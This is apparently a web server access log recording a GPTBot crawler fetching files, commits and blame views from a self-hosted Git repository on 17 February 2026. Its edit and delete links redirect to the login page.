AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:16:32:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2fCMakeFiles%2fCMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 25691] [Gzip 4.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:16:32:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/tsconfig.json?display=rendered" [Client 74.7.227.38] [Length 11085] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/tsconfig.json" -[17/Feb/2026:16:32:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/metadata.json?display=source" [Client 74.7.227.38] [Length 11505] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/metadata.json" -[17/Feb/2026:16:32:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/status.json?display=rendered" [Client 74.7.227.38] [Length 11111] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/status.json" -[17/Feb/2026:16:32:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/-/projects?q=&sort=recentupdate&state=open" [Client 74.7.227.38] [Length 6806] [Gzip 2.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/-/projects" -[17/Feb/2026:16:32:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/OpcTest%20program%20by%20claude.md?display=source" [Client 74.7.227.38] [Length 22502] [Gzip 6.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/OpcTest%20program%20by%20claude.md" -[17/Feb/2026:16:32:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/8d291f57b63b0b2be49f636657ef35169d418129?files=C%2b%2bProject" [Client 74.7.227.38] [Length 17456] [Gzip 3.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project" -[17/Feb/2026:16:32:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 9955] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:16:32:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 14255] [Gzip 8.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:16:32:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 9954] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:16:32:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 4694] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:16:32:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 14030] [Gzip 9.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:16:32:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 2951] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:16:32:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/.Notebook/%EC%84%A4%EC%B9%98%ED%8C%A8%ED%82%A4%EC%A7%80%20%EC%B2%B4%ED%81%AC%20by%20claude.md" [Client 74.7.227.38] [Length 14290] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.Notebook" -[17/Feb/2026:16:32:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Services.tsx?display=rendered" [Client 74.7.227.38] [Length 10946] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Services.tsx" -[17/Feb/2026:16:32:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/controller-next-todo.md?display=source" [Client 74.7.227.38] [Length 13199] [Gzip 4.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/controller-next-todo.md" -[17/Feb/2026:16:32:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/controller-next-todo.md?display=source" [Client 74.7.227.38] [Length 13230] [Gzip 4.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/controller-next-todo.md" -[17/Feb/2026:16:32:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/controller-next-todo.md?display=source" [Client 74.7.227.38] [Length 13229] [Gzip 4.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/controller-next-todo.md" -[17/Feb/2026:16:32:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/data/logs/letsencrypt-requests_access.log" [Client 74.7.227.38] [Length 9853] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt-requests_access.log" -[17/Feb/2026:16:32:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/data/logs/letsencrypt-requests_error.log" [Client 74.7.227.38] [Length 9853] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt-requests_error.log" -[17/Feb/2026:16:32:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 13554] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old" -[17/Feb/2026:16:32:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 13554] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old" -[17/Feb/2026:16:32:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm" [Client 74.7.227.38] [Length 307675] [Gzip 13.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm" -[17/Feb/2026:16:32:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 11420] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old" -[17/Feb/2026:16:32:55 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/.Notebook/%EC%84%A4%EC%B9%98%ED%8C%A8%ED%82%A4%EC%A7%80%20%EC%B2%B4%ED%81%AC%20by%20claude.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.Notebook/%EC%84%A4%EC%B9%98%ED%8C%A8%ED%82%A4%EC%A7%80%20%EC%B2%B4%ED%81%AC%20by%20claude.md" -[17/Feb/2026:16:32:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/.Notebook/%EC%84%A4%EC%B9%98%ED%8C%A8%ED%82%A4%EC%A7%80%20%EC%B2%B4%ED%81%AC%20by%20claude.md" -[17/Feb/2026:16:32:55 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/.Notebook/%EC%84%A4%EC%B9%98%ED%8C%A8%ED%82%A4%EC%A7%80%20%EC%B2%B4%ED%81%AC%20by%20claude.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.Notebook/%EC%84%A4%EC%B9%98%ED%8C%A8%ED%82%A4%EC%A7%80%20%EC%B2%B4%ED%81%AC%20by%20claude.md" -[17/Feb/2026:16:32:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/.Notebook/%EC%84%A4%EC%B9%98%ED%8C%A8%ED%82%A4%EC%A7%80%20%EC%B2%B4%ED%81%AC%20by%20claude.md" -[17/Feb/2026:16:32:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/.Notebook/%EC%84%A4%EC%B9%98%ED%8C%A8%ED%82%A4%EC%A7%80%20%EC%B2%B4%ED%81%AC%20by%20claude.md" [Client 74.7.227.38] [Length 985] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.Notebook/%EC%84%A4%EC%B9%98%ED%8C%A8%ED%82%A4%EC%A7%80%20%EC%B2%B4%ED%81%AC%20by%20claude.md" -[17/Feb/2026:16:32:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/.Notebook/%EC%84%A4%EC%B9%98%ED%8C%A8%ED%82%A4%EC%A7%80%20%EC%B2%B4%ED%81%AC%20by%20claude.md" [Client 74.7.227.38] [Length 5559] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.Notebook/%EC%84%A4%EC%B9%98%ED%8C%A8%ED%82%A4%EC%A7%80%20%EC%B2%B4%ED%81%AC%20by%20claude.md" -[17/Feb/2026:16:32:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/branch/main/.Notebook/%EC%84%A4%EC%B9%98%ED%8C%A8%ED%82%A4%EC%A7%80%20%EC%B2%B4%ED%81%AC%20by%20claude.md" [Client 74.7.227.38] [Length 17268] [Gzip 9.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.Notebook/%EC%84%A4%EC%B9%98%ED%8C%A8%ED%82%A4%EC%A7%80%20%EC%B2%B4%ED%81%AC%20by%20claude.md" -[17/Feb/2026:16:32:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/.Notebook/%EC%84%A4%EC%B9%98%ED%8C%A8%ED%82%A4%EC%A7%80%20%EC%B2%B4%ED%81%AC%20by%20claude.md" [Client 74.7.227.38] [Length 10001] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.Notebook/%EC%84%A4%EC%B9%98%ED%8C%A8%ED%82%A4%EC%A7%80%20%EC%B2%B4%ED%81%AC%20by%20claude.md" -[17/Feb/2026:16:32:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 11420] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old" -[17/Feb/2026:16:32:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 9981] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old_codec.cpp" -[17/Feb/2026:16:32:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 9980] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old_codec.cpp" -[17/Feb/2026:16:32:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 14061] [Gzip 7.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old_codec.cpp" -[17/Feb/2026:16:33:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 9999] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" -[17/Feb/2026:16:33:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 10473] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" -[17/Feb/2026:16:33:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 14060] [Gzip 7.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old_codec.cpp" -[17/Feb/2026:16:33:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 2228] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old_codec.cpp" -[17/Feb/2026:16:33:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 2228] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old_codec.cpp" -[17/Feb/2026:16:33:03 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/.Notebook/%EC%84%A4%EC%B9%98%ED%8C%A8%ED%82%A4%EC%A7%80%20%EC%B2%B4%ED%81%AC%20by%20claude.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/.Notebook/%EC%84%A4%EC%B9%98%ED%8C%A8%ED%82%A4%EC%A7%80%20%EC%B2%B4%ED%81%AC%20by%20claude.md" -[17/Feb/2026:16:33:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/.Notebook/%EC%84%A4%EC%B9%98%ED%8C%A8%ED%82%A4%EC%A7%80%20%EC%B2%B4%ED%81%AC%20by%20claude.md" -[17/Feb/2026:16:33:03 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/.Notebook/%EC%84%A4%EC%B9%98%ED%8C%A8%ED%82%A4%EC%A7%80%20%EC%B2%B4%ED%81%AC%20by%20claude.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/.Notebook/%EC%84%A4%EC%B9%98%ED%8C%A8%ED%82%A4%EC%A7%80%20%EC%B2%B4%ED%81%AC%20by%20claude.md" -[17/Feb/2026:16:33:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/.Notebook/%EC%84%A4%EC%B9%98%ED%8C%A8%ED%82%A4%EC%A7%80%20%EC%B2%B4%ED%81%AC%20by%20claude.md" -[17/Feb/2026:16:33:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 10000] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" -[17/Feb/2026:16:33:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 10473] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" -[17/Feb/2026:16:33:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 273] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" -[17/Feb/2026:16:33:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" [Client 74.7.227.38] [Length 273] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" -[17/Feb/2026:16:33:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr 